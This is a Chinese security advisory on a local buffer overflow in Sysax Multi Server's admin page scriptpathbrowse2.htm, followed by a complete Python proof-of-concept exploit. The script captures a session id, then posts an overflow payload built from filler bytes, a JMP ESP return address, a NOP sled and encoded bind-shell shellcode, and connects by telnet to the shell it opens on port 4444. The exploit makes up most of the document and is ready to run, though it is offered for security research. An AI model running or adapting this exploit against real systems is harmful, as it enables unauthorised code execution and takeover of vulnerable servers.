Sysax Multi Server 'scriptpathbrowse2.htm'缓冲区溢出漏洞


发布日期:2012-06-19
更新日期:2012-06-29

受影响系统:
Codeorigin Sysax Multi Server 5.60
Codeorigin Sysax Multi Server 5.57
Codeorigin Sysax Multi Server 5.55
Codeorigin Sysax Multi Server 5.53
Codeorigin Sysax Multi Server 5.52
Codeorigin Sysax Multi Server 5.50
Codeorigin Sysax Multi Server 5.25
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 54094

Sysax Multi Server是Windows平台下的SSH2和FTP服务器。

Sysax Multi Server 5.62之前版本在处理管理界面 scriptpathbrowse2.htm 页面的请求时存在缓冲区溢出漏洞,本地攻击者可利用此漏洞执行任意代码。

<*来源:Craig Freyman
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Craig Freyman 提供了如下测试方法:


#!/usr/bin/python
##########################################################################################################
#Title: Sysax <= 5.62 Admin Interface Local Buffer Overflow
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit
#Date Discovered: June 15, 2012
#Vendor Contacted: June 19, 2012
#Details: http://www.pwnag3.com/2012/06/sysax-admin-interface-local-priv.html
##########################################################################################################

import socket,sys,time,re,base64,subprocess

def main():
  """Fetch the admin interface page and capture its session id.

  Reads ``target`` and ``port`` from module globals (set under
  ``__main__``), stores the request string in the global ``login`` and
  the ``sid=<40 chars>`` regex match object in the global ``sid`` for
  ``exploit()`` to use.  Exits with status 1 when no sid is found.
  """
  global login
  print "\n"
  print "****************************************************************************"
  print "        Sysax <= 5.62 Admin Interface Local Buffer Overflow                 "
  print "                    by @cd1zz www.pwnag3.com                              "
  print "****************************************************************************"

  #initial GET
  # A plain GET of the /scgi endpoint; the returned page embeds the
  # session id that the later POST in exploit() must carry.
  login = "GET /scgi? HTTP/1.1\r\n"
  login +="Host: localhost:88\r\n"
  login += "Referer: http://localhost:88\r\n\r\n"

  try:
    r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    r.connect((target, port))
    print "[+] Accessing admin interface"
    r.send(login)
  except Exception, e:
    # Errors are only reported; execution continues and `r` is still
    # used by the recv loop below, so a failed connect resurfaces there.
    print "[-] There was a problem"
    print e
 
  #loop the recv sock so we get the full page
  # NOTE(review): recv() returning '' (peer closed the connection) does
  # not terminate this loop, so a response lacking "</html>" spins here.
  page = '' 
  fullpage = '' 
  while "</html>" not in fullpage:
    page = r.recv(4096)
    fullpage += page
  time.sleep(1)

  #regex the sid from the page
  # The session id is 40 alphanumeric characters following "sid=".  The
  # match object itself is kept; exploit() reads sid.group(0).
  global sid
  sid = re.search(r'sid=[a-zA-Z0-9]{40}',fullpage,re.M)
  if sid is None:
    print "[-] There was a problem finding your SID"
    sys.exit(1)
  time.sleep(1)
  r.close()

def exploit():
  """Send the oversized POST to scriptpathbrowse2.htm and hand off to telnet.

  The request body is ``e2=<base64>``; the decoded value is 392 filler
  bytes, a 4-byte return address, a NOP sled, the shellcode below and a
  trailing sled.  After a fixed delay the script launches ``telnet`` to
  localhost:4444, the LPORT named in the msfpayload comment.  Uses the
  global ``sid`` set by ``main()`` and ``target``/``port`` from
  ``__main__``.  Always exits with status 1.
  """
  #msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
  # Opaque encoder output as generated by the command above; the bytes
  # are not documented individually here.
  shell = (
  "\xdb\xd5\xd9\x74\x24\xf4\xb8\xc3\x8f\xb3\x3e\x5b\x33\xc9"
  "\xb1\x56\x31\x43\x18\x03\x43\x18\x83\xeb\x3f\x6d\x46\xc2"
  "\x57\xfb\xa9\x3b\xa7\x9c\x20\xde\x96\x8e\x57\xaa\x8a\x1e"
  "\x13\xfe\x26\xd4\x71\xeb\xbd\x98\x5d\x1c\x76\x16\xb8\x13"
  "\x87\x96\x04\xff\x4b\xb8\xf8\x02\x9f\x1a\xc0\xcc\xd2\x5b"
  "\x05\x30\x1c\x09\xde\x3e\x8e\xbe\x6b\x02\x12\xbe\xbb\x08"
  "\x2a\xb8\xbe\xcf\xde\x72\xc0\x1f\x4e\x08\x8a\x87\xe5\x56"
  "\x2b\xb9\x2a\x85\x17\xf0\x47\x7e\xe3\x03\x81\x4e\x0c\x32"
  "\xed\x1d\x33\xfa\xe0\x5c\x73\x3d\x1a\x2b\x8f\x3d\xa7\x2c"
  "\x54\x3f\x73\xb8\x49\xe7\xf0\x1a\xaa\x19\xd5\xfd\x39\x15"
  "\x92\x8a\x66\x3a\x25\x5e\x1d\x46\xae\x61\xf2\xce\xf4\x45"
  "\xd6\x8b\xaf\xe4\x4f\x76\x1e\x18\x8f\xde\xff\xbc\xdb\xcd"
  "\x14\xc6\x81\x99\xd9\xf5\x39\x5a\x75\x8d\x4a\x68\xda\x25"
  "\xc5\xc0\x93\xe3\x12\x26\x8e\x54\x8c\xd9\x30\xa5\x84\x1d"
  "\x64\xf5\xbe\xb4\x04\x9e\x3e\x38\xd1\x31\x6f\x96\x89\xf1"
  "\xdf\x56\x79\x9a\x35\x59\xa6\xba\x35\xb3\xd1\xfc\xfb\xe7"
  "\xb2\x6a\xfe\x17\x25\x37\x77\xf1\x2f\xd7\xd1\xa9\xc7\x15"
  "\x06\x62\x70\x65\x6c\xde\x29\xf1\x38\x08\xed\xfe\xb8\x1e"
  "\x5e\x52\x10\xc9\x14\xb8\xa5\xe8\x2b\x95\x8d\x63\x14\x7e"
  "\x47\x1a\xd7\x1e\x58\x37\x8f\x83\xcb\xdc\x4f\xcd\xf7\x4a"
  "\x18\x9a\xc6\x82\xcc\x36\x70\x3d\xf2\xca\xe4\x06\xb6\x10"
  "\xd5\x89\x37\xd4\x61\xae\x27\x20\x69\xea\x13\xfc\x3c\xa4"
  "\xcd\xba\x96\x06\xa7\x14\x44\xc1\x2f\xe0\xa6\xd2\x29\xed"
  "\xe2\xa4\xd5\x5c\x5b\xf1\xea\x51\x0b\xf5\x93\x8f\xab\xfa"
  "\x4e\x14\xdb\xb0\xd2\x3d\x74\x1d\x87\x7f\x19\x9e\x72\x43"
  "\x24\x1d\x76\x3c\xd3\x3d\xf3\x39\x9f\xf9\xe8\x33\xb0\x6f"
  "\x0e\xe7\xb1\xa5")
 
  nops = "\x90" * 20
  #7CA7A787 FFE4 JMP ESP shell32.dll v6.00.2900.6072
  # Return address written in little-endian byte order; it is tied to the
  # exact shell32.dll build named above (XP SP3 per the file header).
  jmp_esp = "\x87\xA7\xA7\x7C"
  # Decoded layout: 392 filler bytes, return address, sled, shellcode,
  # trailing sled.  Base64-wrapped -- presumably the server decodes the
  # e2 field before copying it; not shown here.
  payload = base64.b64encode(("A" * 392 + jmp_esp + nops + shell + nops))
 
  #setup exploit
  # Local string that shadows the function name.  From a detection
  # standpoint the distinguishing features are a POST to /scgi with
  # pid=scriptpathbrowse2.htm and an e2 value hundreds of bytes long.
  exploit = "POST /scgi?"+str(sid.group(0))+"&pid=scriptpathbrowse2.htm HTTP/1.1\r\n"
  exploit += "Host: localhost:88\r\n"
  exploit += "Content-Type: application/x-www-form-urlencoded\r\n"
  # +3 accounts for the "e2=" prefix; the trailing "\r\n\r\n" appended
  # after the payload is not included in the declared length.
  exploit += "Content-Length: "+ str(len(payload)+3)+"\r\n\r\n"
  exploit += "e2="+payload+"\r\n\r\n"

  try:
    r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    r.connect((target, port))
    print "[+] Sending pwnag3"
    r.send(exploit)
  except Exception, e:
    # As in main(): failures are printed, then the script carries on to
    # the telnet hand-off regardless.
    print "[-] There was a problem"
    print e
  time.sleep(2)
  print "[+] Here is your shell..."
  # shell=True with a fixed command string; no external input reaches it.
  subprocess.Popen("telnet localhost 4444", shell=True).wait()
  # Exit status is 1 on every path, including success.
  sys.exit(1)

if __name__ == '__main__':
  # The script takes no arguments.  The usage string's "%s" has no
  # operand, so it is printed literally rather than filled in.
  if len(sys.argv) != 1:
    print "[-] Usage: %s"
    sys.exit(1)
 
  #by default it binds to 127.0.0.1 on 88
  # Module globals read by main() and exploit(); per the comment above the
  # service listens on loopback by default, hence the fixed target.
  target = "127.0.0.1"
  port = 88
  main()
  exploit()

建议:
--------------------------------------------------------------------------------
厂商补丁:

Codeorigin
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ftpshell.com/index.htm
